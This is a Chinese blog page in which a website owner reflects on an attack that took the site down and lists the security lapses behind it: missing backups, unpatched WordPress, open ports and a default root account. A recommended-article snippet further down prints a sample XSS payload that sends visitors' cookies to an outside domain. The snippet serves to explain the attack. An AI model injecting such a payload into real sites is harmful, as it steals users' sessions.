网站被攻击的总结反思

最新推荐文章于 2022-05-01 08:45:00 发布
最新推荐文章于 2022-05-01 08:45:00 发布
阅读量764 收藏 1
点赞数 1
分类专栏: web 文章标签: web 服务器 安全狗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_32582203/article/details/52259826
版权

前段时间网站遭遇恶意攻击,以致无法访问,我对网络安全不是很了解,也只能从表面现象判断可能是遭遇了类似cc攻击,真的是书到用时方恨少,面对攻击真的是一筹莫展,毫无办法。其实早在前几天,我就已经发现网站有恶意注册现象发生,但并没有引起多少警觉,天真的认为阿里的服务器还是很安全的,有个云盾基础版也就差不多够用了,再说我这个小网站,也没什么攻击价值,结果酿成了悲剧。现在大致总结一下,有以下几个方面的问题:

  • 网站数据没有进行合理的备份,网站崩溃后无法进入数据库系统,想备份也迟了,记住隔段时间进行一次备份,备份wordpress的文章数据已经MySQL的数据库数据。
  • wordpress WP_Image_Editor_Imagick指令注入漏洞没有及时修复,也造成了潜在的隐患。
  • 当初为了解决图片上传问题,部分文件夹的权限设置过高,也存在安全隐患,今后一律改用外链图片,也顺便减轻服务器负担。
  • 这次修复的过程中也发现,windows系统的远程连接可以直接使用复制粘贴实现文件的传输,而无须开启ftp服务(神奇)。所以修复后我也没有再使用ftp,也未添加ftp账号。
  • 开放端口太多,给人可趁之机,需关闭不必要的端口。
  • 服务器上没有相关防护软件,我又对这方面不是很懂,这次修复后给服务器装了安全狗,管不管用先看看吧。
  • 数据库系统的默认root账号与root密码均未修改,存在安全隐患。这次修复后新添加了与root用户有相同权限但有强口令的用户,并删除了原有的root账号。
  • 麻痹大意,以为网站小就没事,但可能有的黑客就专找软柿子捏,或者有新手找简单的练习技术也不一定啊,( ╯□╰ )。

总之,有空的话真的要恶补一下这方面的知识了。

洒满阳光的午后
关注
专栏目录
常见web攻击总结
weixin_30418341的博客
04-12 331
每天学习一点点 编程PDF电子书、视频教程免费下载:http://www.shitanlife.com/code XSS 什么是XSS XSS攻击:跨站脚本攻击(Cross-Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。XSS是一种常见的web安全漏洞,它允许攻击者将恶意代...
XSS challenges解析及反思和对XSS漏洞的一点总结
ghtwf01的博客
12-01 720
Stage #1(没有过滤的XSS) 随便在文本框输入一点内容,发现它会直接将输入的文本输出到网页上显示,查看网页元素,发现是b标签 两种思路: 1.闭合b标签,如图 2.它会直接将输入的字符串输出在网页上显示,可以考虑直接输入JS代码,如图 Stage #2(属性标签中的XSS) 还是随便输点东西上去,查看网页元素,发现文本在属性标签value里面 两种思路 1.闭合input标签 2.闭合value标签,利用on事件触发XSS javascript on事件大全参考链接https://www..
网站如何真实有效的抵御DDOS CC攻击?与DDOS斗争中总结出来的防护经验
weixin_39974124的博客
12-04 401
首先我想先说一下,刚开始做网站运营的时候,对于这个行业了解不是很透彻,不知道原来还能通过 攻击别人的服务器 来达到自己的目的。后来慢慢对这些有了一定的了解。 主要的原因是涉及到了利益,如果经营状况很好的情况下,免不了被一些同行业的人眼红心生妒忌,就导致他剑走偏锋,通过进行大流量的网络攻击,使竞争对手的业务无法访问,以此来达到打压竞争对手,提高自己平台的访问量。 一种是属于报复性攻击,有一...
个人网站再次遭受CC攻击总结—wdcp环境下抵御CC攻击的方法
熊猫产品经理
01-21 2632
2014年底,文武双全个人网站刚刚遭受了一次CC攻击,详见文武双全个人网站遭遇严重CC攻击总结 。2015年新年刚过,个人博客这又被攻击了。此次攻击是从2015年1月18日凌晨3点开始的,大约在2015年1月22日凌晨0点网站可以正常访问了。下面是此次应对CC攻击总结,希望能够对大家以后防黑防CC有帮助。文武双全个人网站是在WDCP环境下和阿里云主机上,此文可能对以上用户有帮助。 阿里云
网络攻防学习心得一(20159320)黑客信息
weixin_30856965的博客
03-13 1247
中国黑客联盟核心人物 goodwell   网名:goodwell 所属组织;绿色兵团 介绍:中国最早黑客组织绿色兵团的创始人,中国黑客界泰斗级元老。作为中国黑客界最早组织创始人,goodwell领导下绿色兵团在网络界甚至更广领域都得到认同。他与其组织揭开中国黑客历史的序幕。他个人也因此受到黑客界的爱戴。虽然现在他本人已经很少在黑客界露面,其组织也已经解散。但他对黑客界的贡献仍是巨大的...
网站被K后的表现、原因及解决方法.docx
10-14
网站被 K 后的表现、原因及解决方法 一、网站被 K 后的表现 当网站被百度 K 掉后,网站的...网站被 K 后的表现、原因及解决方法是一个复杂的问题,需要我们从多方面入手,认真反思总结,提高网站的收录情况和排名。
信息安全概论:学习成果总结反思
信息安全的不足可能导致用户数据泄露、金融欺诈、网络攻击等问题,给个人和组织带来严重的经济和声誉损失。 同时,信息安全问题也威胁到国家安全和社会稳定。网络攻击已成为一种全球性的威胁,各个国家都在加强信息...
DVWA靶机基于XSS(跨站脚本攻击)的实验
CSFMSKK的博客
06-28 836
书说前言:本文针对DVWA靶机实验,仅供参考。如有雷同,实属他抄。如有用于不轨途径,与本人毫无瓜葛。 XSS是一种发生在前端浏览器的漏洞。XSS某种意义上也是一种注入攻击攻击者在页面注入恶意代码,当受害者访问网站该页面时,恶意代码就会在浏览器上执行。 XSS共有3种:反射型、存储型、DOM型。 反射型: low级别:没有任何的过滤和检查,存在明显的XSS漏洞。 直接修改URL 然后执行 medium 对<script>做了黑名单限制 思路:抓包,利用双写和大小写混淆
SQL注入攻击实验报告.doc
最新发布
07-15
#### 五、实验总结反思 - **安全意识**:本实验强调了开发者和运维人员在编写代码和维护系统时应具备的安全意识,尤其是在处理用户输入时必须采取严格的输入验证和转义措施。 - **防御措施**:了解了SQL注入攻击...
三年Linux运维工作总结教训
javalingyu的博客
05-01 765
阅读目录 一、线上操作规范 二、涉及数据 三、涉及安全 四、日常监控 五、性能调优 六、运维心态 Linux运维一定要知道的六类好习惯和23个教训,避免入坑! 从事运维三年半,遇到过各式各样的问题,数据丢失,网站挂马,误删数据库文件,黑客攻击等各类问题。 今天简单整理一下,分享给各位小伙伴。 回到顶部 一、线上操作规范 1.测试使用 当初学习Linux的使用,从基础到服务到集群,都是在虚拟机做的,虽然老师告诉我们跟真机没有什么差别,可是对真实环境的渴望日渐上升,不过虚拟机的各种快照却
网络攻防学习心得一(20159320)学习小结
weixin_30593443的博客
03-13 3221
在最近的学习过程中,主要学习的是一些简单壳的脱壳问题还有就是一些脱壳工具的运用。其中,最主要的就是自己的练习,仅仅看教学视频并不能学到什么,只有自己动手之后,才会通过自己的实践,找到问题。而在我自己的操作的时候,出现很多问题,其中很多情况下,步骤什么的都是完全跟随视频教学一模一样的走,但是就是出问题,这应该是就是电脑环境的问题吧。通过对这些问题的解决可以学习解决问题的能力。 然后,在OD运用方面...
针对802.11网络攻击的个人心得
只为改变自己
03-20 1537
个人三月份该方面的学习汇总,希望不断进步
网站常用攻击技术详解
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会..
入门计算机的粗略学习-Day11
imudges_Zy的专栏
11-04 346
分布式系统 为什么会出现分布式系统呢? 我们发现使用互联网的用户越来越多,我们需要为越来越多的用户提供服务。那么我们的服务器就要求性能越来越高,但是总是会出现瓶颈。并且我们要为用户提供长效稳定的服务,不能因为网络服务商的原因或者自然灾害导致整个服务不可用。 因此有了分布式系统。 ...
让C代码在浏览器中运行——WebAssembly入门介绍
热门推荐
洒满阳光的午后的博客
06-16 6万+
WebAssembly作为一种新兴的Web技术,相关的资料和社区还不够丰富,但其为web开发提供了一种崭新的思路和工作方式,未来是很有可能大放光彩的。 使用WebAssembly,我们可以在浏览器中运行一些高性能、低级别的编程语言,可用它将大型的C和C++代码库比如游戏、物理引擎甚至是桌面应用程序导入Web平台。 截至目前为止,我们已经可以在Chrome、Firefox中使用WebAs
如何搭建一个网站
洒满阳光的午后的博客
04-24 5万+
过几年再看,当时写的内容还挺幼稚,后面看到这篇文章的童鞋,其实只需要关注这篇文章写的一些流程即可,技术性的东西就不要细看了,写得不一定对。 ——2019年7月10日补充内容 大概在今年二月份,我萌生了搭建一个网站的想法,原因大概有两个:一是平时做公众号需要很多的素材,我选文的标准也是有两个,或者觉得这篇文章对我或者对大家有用,或者看完了能够哈哈一笑,是篇有趣的文章,否则我是宁愿不发文...
使用Web Speech API实现语音文本互转
洒满阳光的午后的博客
09-25 1万+
本教程中,我们将尝试使用Web Speech API,这是一个非常强大的浏览器接口,可以用来记录语音并将其转换为文本,同样的,也可以用来朗读字符串。 接下来进入正题,这个App应当具有以下几个功能: 通过语音录入或者键盘输入的方式保存笔记;将笔记保存到本地;显示历史笔记并可以通过语音朗读笔记; 此App无需使用任何花哨的依赖,只需使用jQuery来进行简单的DOM操作,以及Sho
使用Phaser框架构建你的第一个H5游戏
洒满阳光的午后的博客
06-15 1万+
还记得贪吃蛇这个经典游戏吗?在诺基亚时代,在黑白像素点游戏机时代,就是这样一个简单的游戏也能让我们玩上几个小时。 在这篇文章,我们将使用HTML5来重现这个游戏,基于著名的开源HTML5游戏框架——Phaser。你将了解到游戏精灵、游戏状态,以及如何使用预加载(preload)、创建(create)与刷新(update)方法。最终效果呈现如下: 一、开发准备 首先访问Ph
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

洒满阳光的午后

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值